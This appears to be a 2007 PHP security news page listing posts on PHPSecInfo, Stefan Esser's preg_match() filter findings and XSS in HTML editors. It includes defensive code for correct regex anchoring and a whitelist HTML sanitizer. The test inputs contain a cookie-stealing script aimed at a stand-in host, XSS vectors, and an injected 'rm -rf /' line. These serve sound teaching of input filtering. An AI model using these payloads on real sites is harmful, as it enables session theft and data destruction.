PHPSecInfo v0.2.1 Now Available
by Cal Evans (editor) |
0 comments | Friday, April 6, 2007
PhpSecInfo v0.2.1 is now available. It’s primarily a bugfix release, but a fairly significant one.
Stefan Esser Finds Holes in Most preg_match() Filters
by Cal Evans (editor) |
0 comments | Wednesday, April 4, 2007
Stefan Esser posted on his blog today about a problem he discovered in code he was auditing recently. The problem he discusses is in the way the regular expressions in input filters are written, and in the PCRE modifiers that may or may not be applied to them.
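The page does not reproduce Esser's examples, so the following is an added illustration (not code from his post or from this site) of the best-known way a preg_match() filter goes wrong: in PCRE, `$` matches at the true end of the subject *or* just before a trailing newline, and the `m` modifier lets it match at every line break. The filter regex, the modifier variants and the inputs below are constructed for the demo.

```php
<?php
// Added example: why "$" is not a reliable end-of-string anchor in
// preg_match() filters, and two ways to anchor correctly.

// Typical "username" filter as many apps wrote it. "$" also matches right
// before a final "\n", so "alice\n" passes unchanged.
function filter_dollar(string $s): bool {
    return preg_match('/^[a-z0-9_]+$/', $s) === 1;
}

// With the "m" modifier ^ and $ match at every line boundary, so any input
// that contains one well-formed line passes, whatever surrounds it.
function filter_multiline(string $s): bool {
    return preg_match('/^[a-z0-9_]+$/m', $s) === 1;
}

// Fix 1: the "D" (PCRE_DOLLAR_ENDONLY) modifier makes "$" match only at
// the real end of the subject (it is ignored if "m" is also set).
function filter_dollar_endonly(string $s): bool {
    return preg_match('/^[a-z0-9_]+$/D', $s) === 1;
}

// Fix 2: anchor with \A and lowercase \z, which are unaffected by modifiers.
// Note that uppercase \Z behaves like "$" and still allows a trailing newline.
function filter_absolute(string $s): bool {
    return preg_match('/\A[a-z0-9_]+\z/', $s) === 1;
}

// Constructed inputs: a clean value, one with a trailing newline, one with
// an injected second line, and one with a leading newline.
$inputs = ["alice", "alice\n", "alice\nrm -rf /", "\nalice"];

printf("%-22s %-6s %-6s %-6s %-6s\n", 'input', '$', '$/m', '$/D', '\\A..\\z');
foreach ($inputs as $in) {
    printf("%-22s %-6s %-6s %-6s %-6s\n",
        json_encode($in, JSON_UNESCAPED_SLASHES),
        var_export(filter_dollar($in), true),
        var_export(filter_multiline($in), true),
        var_export(filter_dollar_endonly($in), true),
        var_export(filter_absolute($in), true));
}
// Expected table (worked out by hand from the PCRE rules above):
//   "alice"            true   true   true   true
//   "alice\n"          true   true   false  false
//   "alice\nrm -rf /"  false  true   false  false
//   "\nalice"          false  true   false  false
```

The practical rule this shows: a validating regex that is meant to cover the whole value should use `\A...\z` (or the `D` modifier without `m`); if the downstream code later passes the "validated" string to a shell, SQL, a header or a filename, the stray newline that `$` lets through is exactly the byte that matters.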
Avoiding XSS security attacks to sites that use HTML editors
by ml |
9 comments | Wednesday, March 7, 2007
HTML editors are special form fields that let Web site users visually edit (WYSIWYG) rich-text content formatted with HTML tags. They are powerful, but unless the HTML they submit is filtered on the server, the sites that use them can be abused for cross-site scripting (XSS).
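As an added example of the server-side filtering such a site needs (this is not code from the article, nor from any editor project; the element and attribute whitelists, the scheme list and the sample input are constructed for the demo), here is a whitelist sanitizer for editor output: parse the submitted HTML into a DOM, keep only known-safe elements and attributes, and reject `href`/`src` values whose scheme can run script.

```php
<?php
// Added example: whitelist-based sanitizer for HTML submitted from a
// WYSIWYG editor. Everything not explicitly allowed is dropped.

const DROP_WITH_CONTENT = ['script', 'style', 'iframe', 'object', 'embed', 'noscript'];
const ALLOWED_TAGS      = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li',
                           'blockquote', 'h1', 'h2', 'h3', 'a', 'img'];
const ALLOWED_ATTRS     = ['a' => ['href', 'title'], 'img' => ['src', 'alt']];
const ALLOWED_SCHEMES   = ['http', 'https', 'mailto'];

// Accept relative URLs and the listed schemes only. Control characters and
// whitespace are stripped first because browsers ignore them ("java\tscript:").
// The DOM already decoded entities, so "javascript&#58;" arrives as "javascript:".
function url_is_safe(string $url): bool {
    $u = preg_replace('/[\x00-\x20\x7f]+/', '', $url);
    if (!preg_match('/^([a-z][a-z0-9+.\-]*):/i', $u, $m)) {
        return true;                       // no scheme at all: relative URL
    }
    return in_array(strtolower($m[1]), ALLOWED_SCHEMES, true);
}

function clean_children(DOMNode $parent): void {
    // Snapshot the list: removing nodes while iterating a live DOMNodeList skips siblings.
    foreach (iterator_to_array($parent->childNodes, false) as $child) {
        if ($child instanceof DOMText) {
            continue;                      // text is re-escaped by the serializer
        }
        if (!($child instanceof DOMElement)) {
            $parent->removeChild($child);  // comments, processing instructions, CDATA
            continue;
        }
        $name = strtolower($child->tagName);
        if (in_array($name, DROP_WITH_CONTENT, true)) {
            $parent->removeChild($child);  // element and its contents go together
            continue;
        }
        clean_children($child);            // clean the subtree before judging the element
        if (!in_array($name, ALLOWED_TAGS, true)) {
            // Unknown element: keep its (already cleaned) children, drop the tag itself.
            while ($child->firstChild !== null) {
                $parent->insertBefore($child->firstChild, $child);
            }
            $parent->removeChild($child);
            continue;
        }
        foreach (iterator_to_array($child->attributes, false) as $attr) {
            $aname = strtolower($attr->name);
            $keep  = in_array($aname, ALLOWED_ATTRS[$name] ?? [], true)
                  && (!in_array($aname, ['href', 'src'], true) || url_is_safe($attr->value));
            if (!$keep) {
                $child->removeAttribute($attr->name);   // drops on* handlers, style, target, ...
            }
        }
    }
}

function sanitize_html(string $untrusted): string {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);      // tolerate the tag soup editors produce
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $untrusted . '</body>');
    libxml_clear_errors();
    $body = $doc->getElementsByTagName('body')->item(0);
    clean_children($body);
    $out = '';
    foreach ($body->childNodes as $node) {
        $out .= $doc->saveHTML($node);     // serializer re-escapes text and attribute values
    }
    return $out;
}

// Constructed attacker-style input mixing legitimate formatting with XSS vectors.
$input = '<p onmouseover="alert(1)">Hello <b>world</b></p>'
       . '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
       . '<a href="javascript:alert(document.domain)">click</a>'
       . '<a href="https://example.org/" target="_blank">ok</a>'
       . '<img src="x" onerror="alert(1)">'
       . '<!-- hidden --><marquee>legacy</marquee>';
echo sanitize_html($input), "\n";
// Expected: <p>Hello <b>world</b></p><a>click</a><a href="https://example.org/">ok</a><img src="x">legacy
```

Two design points worth noting. Filtering happens on a parsed tree, not with regular expressions over the raw string, so malformed markup is normalised by the parser before the whitelist is applied, and the serializer re-escapes whatever text survives. And the decision is made on the whitelist side only: an attribute or element the code does not know is removed, which is what keeps new browser features from turning into new bypasses. For production use, a maintained library such as HTML Purifier does the same job with far more corner cases covered; the point of the block is to make the approach visible.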
OWASP Spring of Code 2007
by Cal Evans (editor) |
0 comments | Tuesday, March 6, 2007
Chris Shiflett and Laura Thompson both announced on their blogs that during the lightning talks at last night’s PHP Meetup, Andrew van der Stock (executive director of OWASP) announced the Spring of Code 2007. This ambitious effort will distribute $100,000 to worthy projects.
Do Open Source Devs Get Web App Security? Does Anybody?
by coj |
0 comments | Wednesday, February 28, 2007
A colleague of mine who is dealing with Plone, a CMS system built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.
PHPSecInfo News
by Cal Evans (editor) |
0 comments | Tuesday, February 27, 2007
Ed Finkler pinged me this morning about a couple of news items relating to PHPSecInfo. Click on inside, I’ll give you the scoop.
PHP Security From The Inside
by Cal Evans (editor) |
0 comments | Wednesday, February 7, 2007
Federico Biancuzzi has published an interesting article at securityfocus.com in which he interviews Stefan Esser. Click on inside, let’s talk about this.
PHPSecInfo: New release (0.1.2), new plans
by Cal Evans (editor) |
0 comments | Saturday, December 23, 2006
Ed Finkler sent out an email yesterday to thousands of his closest friends, announcing the release of the latest version of PHPSecInfo. If you're not on his “A” list, click on inside and I’ll share the email with you.
Zeev Suraski Responds to Slashdot Misquote
by Cal Evans (editor) |
2 comments | Thursday, December 14, 2006
In a recent story on slashdot.org about Stefan Esser resigning from the PHP security team, comments were flying fast and furious. Among them was a comment that Zeev Suraski felt misquoted him. Come on inside, I’ll share with you what I know.
Ed Finkler Talks About PHPSecInfo
by Cal Evans (editor) |
1 comment | Saturday, October 21, 2006
Recently the PHP Security Consortium released their latest project, PHPSecInfo. PHPSecInfo was conceived and written by Ed Finkler, who works at CERIAS, the Center for Education and Research in Information Assurance and Security. Intrigued as much by this project as I was by the fact that Ed wrote me and told me it was time for me to interview him, I called Ed and we talked about the project. Click on inside and read what he had to say.
